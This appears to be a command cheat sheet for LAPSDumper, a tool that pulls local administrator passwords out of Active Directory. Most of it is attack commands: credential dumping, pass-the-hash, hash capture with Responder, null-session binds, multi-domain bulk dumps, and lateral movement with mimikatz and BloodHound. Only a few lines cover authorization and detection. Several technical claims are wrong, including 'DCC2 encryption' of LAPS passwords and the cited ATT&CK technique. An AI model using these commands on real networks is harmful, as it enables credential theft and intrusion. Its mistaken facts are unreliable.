LAPSDumper is a command-line tool for extracting Local Administrator Password Solution (LAPS) passwords from Active Directory environments. LAPS manages local administrator account passwords and stores them in AD attributes. LAPSDumper queries AD to retrieve these credentials, making it essential for authorized penetration testers to identify credential storage and access control weaknesses.
# Clone from GitHub
git clone https://github.com/n1nj4sec/LAPSDumper.git
cd LAPSDumper
# Install dependencies (Python 3.6+)
pip3 install -r requirements.txt
# Alternative: Install via pip
pip3 install lapsdumper
# Using pip
pip install lapsdumper
# Or clone and install locally
git clone https://github.com/n1nj4sec/LAPSDumper.git
cd LAPSDumper
pip install -r requirements.txt
| Command | Description |
|---|
lapsdumper -u user -p password -d domain.local | Dump LAPS passwords with username/password auth |
lapsdumper -u user -H hash -d domain.local | Use NTLM hash instead of plaintext password |
lapsdumper -u user -p password -d domain.local -s dc01.domain.local | Specify target domain controller |
lapsdumper --ldap-server 192.168.1.10 -u admin -p pass | Target specific LDAP server by IP |
# Kerberos authentication
lapsdumper -u user@domain.local -k -d domain.local
# LDAPS (LDAP over SSL)
lapsdumper -u user -p password -d domain.local --ldaps
# Null session (if AD allows anonymous binds)
lapsdumper -d domain.local --null-session
# Dump specific computer name
lapsdumper -u admin -p password -d domain.local -c COMPUTER_NAME
# Export to CSV
lapsdumper -u admin -p password -d domain.local -o output.csv
# Filter by OU
lapsdumper -u admin -p password -d domain.local --ou "OU=Servers,DC=domain,DC=local"
# JSON output for parsing
lapsdumper -u admin -p password -d domain.local --json
# Pass-the-hash with NTLM
lapsdumper -u DOMAIN\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d domain.local
# Extract hash with Responder first
responder -I eth0 -w
# Then use hash with LAPSDumper
lapsdumper -u domain\\user -H hash_value -d domain.local
# Query specific LAPS attributes
ldapsearch -x -H ldap://dc01.domain.local -D "CN=admin,CN=Users,DC=domain,DC=local" \
-w password -b "DC=domain,DC=local" \
"(ms-Mcs-AdmPwd=*)" ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
# Search for computers with LAPS enabled
ldapsearch -x -H ldap://dc01.domain.local \
-b "DC=domain,DC=local" \
"(&(objectClass=computer)(ms-Mcs-AdmPwd=*))"
| Attribute | Description | Type |
|---|
ms-Mcs-AdmPwd | Encrypted local admin password | String |
ms-Mcs-AdmPwdExpirationTime | Password expiration timestamp | Integer (Windows filetime) |
ms-Mcs-AdmPwdHistory | Historical password values | String |
# Example output format
[+] Dumping LAPS passwords...
[*] Computer: WORKSTATION-01
Password: C0mpl3xP@ssw0rd!
Expiration: 2026-05-10 14:30:00
[*] Computer: WORKSTATION-02
Password: P@ssw0rd123!Secure
Expiration: 2026-05-09 09:15:00
# Process results
lapsdumper -u admin -p password -d domain.local | grep "Password:" | cut -d: -f2
# Convert CSV to readable format
lapsdumper -u admin -p password -d domain.local -o laps.csv
# Parse with awk
awk -F',' '{print $1, $3}' laps.csv
# Extract passwords only
cut -d',' -f3 laps.csv | tail -n +2
# "LDAP bind failed"
# Solution: Verify credentials and domain controller availability
lapsdumper -u domain\\user -p password -d domain.local -s dc01.domain.local -v
# "No LAPS passwords found"
# Reason: LAPS not enabled or insufficient permissions
# Check AD schema version and permissions
# "Connection timeout"
# Solution: Specify DC IP instead of hostname
lapsdumper -u user -p password -s 192.168.1.10
# Enable verbose output for debugging
lapsdumper -u admin -p password -d domain.local -vv
# Verify account has read permissions on LAPS attributes
# Use Active Directory Users and Computers or ADSIEdit
# Minimal permissions needed:
# - Read permissions on computer objects
# - Read permissions on ms-Mcs-AdmPwd attribute
# - Read permissions on ms-Mcs-AdmPwdExpirationTime attribute
# LAPS passwords are typically 14-32 characters
# Format: Mix of uppercase, lowercase, numbers, and special characters
# Storage: Encrypted in Active Directory with DCC2 encryption
# Access: Delegated via Group Policy and AD permissions
| Scenario | Attack Path |
|---|
| Low-privileged domain user | May have permissions to read LAPS on delegated OUs |
| Domain admin compromise | Can read all LAPS passwords without restrictions |
| Group Policy abuse | Misconfigured permissions on LAPS-enabled OUs |
| Delegation overflow | LAPS permissions inherited from parent OUs incorrectly |
# Enable audit logging for LAPS queries
auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
# Monitor event logs
Get-EventLog -LogName Security -InstanceId 4662 | Where-Object {$_.Message -like "*ms-Mcs-AdmPwd*"}
# Restrict LAPS password read permissions
# Limit to specific security groups
# Audit and monitor all queries
# Use LAPS v2 with stronger encryption
# Enforce Windows LAPS for additional protection
# After dumping LAPS passwords, use them with mimikatz
mimikatz> sekurlsa::logonpasswords
# Or pass credentials to other tools
LAPSDumper -u admin -p password -d domain.local > creds.txt
# Use extracted credentials for lateral movement
# Combine LAPSDumper with BloodHound for AD analysis
# 1. Run BloodHound to map AD structure
# 2. Identify computers with LAPS enabled
# 3. Use LAPSDumper to extract passwords
# 4. Map lateral movement paths
# Dump from large Active Directory with progress
lapsdumper -u admin -p password -d domain.local --progress
# Limit results to reduce load
lapsdumper -u admin -p password -d domain.local --max-results 1000
# Dump specific OUs only
lapsdumper -u admin -p password -d domain.local \
--ou "OU=Servers,DC=domain,DC=local" \
--ou "OU=Workstations,DC=domain,DC=local"
# Process multiple domains
for domain in corp.local subsidiary.local partner.local; do
lapsdumper -u admin -p password -d $domain -o ${domain}_laps.csv
done
# Consolidate results
cat *.csv > all_laps.csv
sort -u all_laps.csv > unique_laps.csv
- Written authorization from system owner
- Scope limited to authorized infrastructure
- Proper documentation of all credentials obtained
- Secure handling of sensitive credentials
- Reporting and credential rotation procedures
# Encrypt output files
gpg --symmetric output.csv
# Secure temporary files
shred -vfz -n 10 output.csv
# Use in-memory processing when possible
lapsdumper ... | grep "Password:" | uniq
- LAPS Official Documentation: Microsoft LAPS
- BloodHound: LAPS enumeration module
- Active Directory Security Blog: LAPS exploitation techniques
- MITRE ATT&CK: T1110.004 Credential Access
